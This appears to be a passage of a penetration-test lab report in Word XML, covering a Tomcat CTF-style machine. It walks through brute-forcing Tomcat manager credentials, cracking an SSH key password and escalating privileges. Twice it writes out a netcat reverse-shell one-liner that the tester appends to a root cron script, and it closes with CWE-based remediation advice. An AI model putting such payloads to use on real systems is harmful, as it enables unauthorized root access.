        <w:t xml:space="preserve">I cracked the hash and received the password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vodka06</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>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I used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c ‘import pty; pty.spawn(„/bin/bash”)’</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make the underlying</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell more interactive and ran su thales with newly </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">acquired</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> password to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access the user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1ysby0c7w6vk" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation</w:t>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pacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.twk32aa38fsl" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With new access, I was able to find and read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file with the user flag. I also noticed a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notes.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file with information about backup.sh cron file, which automatically runs with root privileges. The key part was the fact that thales ( user ) had read and write access to that file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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I found information about a payload that can be used to create a reverse shell inside of that file. I had to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo ‘rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc 192.168.239.6 3000 &gt; /tmp/f’ &gt;&gt; backup.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command to inject a reverse shell payload inside of backup.sh. In short, It removes any old pipe and creates a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FIFO ( First-In-First-Out )</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">named pipe. This acts as a relay station for data. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">part creates an interactive shell and passes the values from cat into it. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nc 192.168.239.6 3000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connects my Kali machine with this shell and redirects everything I write back into the pipe file, which further moves response data back into the shell.</w:t>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After successfully connecting via netcat, I had access to root privileges and could read the root.txt file with root flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.q4gfxvnm2tqk" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction of the steps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nmap I found information about the target and its active services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5516521" cy="2113634"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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516521" cy="2113634"/>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5753100" cy="2254250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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753100" cy="225425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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5740400" cy="2533650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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40400"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Using Metasploit’s auxiliary module scanner/http/tomcat_mgr_login I found the password for Tomcat’s service account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5740400" cy="2546350"/>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40400" cy="254635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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5753100" cy="2565400"/>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531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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="2590800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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74675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With the password found, I used the multi/http/tomcat_mgr_upload exploit module to deploy a shell on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="2616200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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75945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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="2647950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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46750"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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="2457450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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46750"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After finding the .ssh directory, I copied the id_rsa file as thales_id_rsa and used John to crack the encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="2514600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12"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75945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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5753100" cy="2438400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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7531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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="1644650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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746750" cy="164465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With credentials ready I went back to the shell, used python command to make it interactive and ran su thales to login as an authenticated user. I received the user.txt flag and found a notes.txt file with information about backup files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="2857500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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74675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Using a command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo ‘rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc 192.168.239.6 3000 &gt; /tmp/f’ &gt;&gt; backup.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="548dd4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I managed to connect to my reverse shell via netcat on port 3000 and read the root.txt flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5753100" cy="2508250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14"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753100" cy="250825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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="1549400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15"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746750" cy="1549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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.o5vzxk49yirg" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As a result of this assessment there are several vulnerabilities ( CWEs ) that are worth noticing. Abusing them led me from an unauthenticated user to a full local privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5y23cpuk3z50" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation</w:t>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-521 ( Weak Password Requirements ) :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stronger password policy, randomly chosen secrets, like generated passwords ( similar to password managers ), setting minimum length and number of different symbols, letters and numbers.</w:t>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-307 ( Improper Restriction of Excessive Authentication Attempts ) :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>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color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rate limiting, timeout, blocking the targeted account or providing an additional task to perform authentication.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-276 ( Incorrect Default Permissions )</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Removing unnecessary permissions and files, making sure that zero-trust policy is being used, creating „safe” areas, double-checking the permissions for potentially dangerous or sensitive files.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-732 ( Incorrect Permission Assignment for Critical Resource ) :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When using a critical resource such as a configuration file, check to see if the resource has insecure permissions (such as being modifiable by any regular user)</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ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-250 ( Execution with Unnecessary Privileges ) :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run your code or files using the lowest privileges that are required to accomplish the necessary tasks.</w:t>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ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-284 ( Improper Access Control ) :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.q8fz382r3uj1" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="548dd4"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/521.html</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-&gt; CWE 521 page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
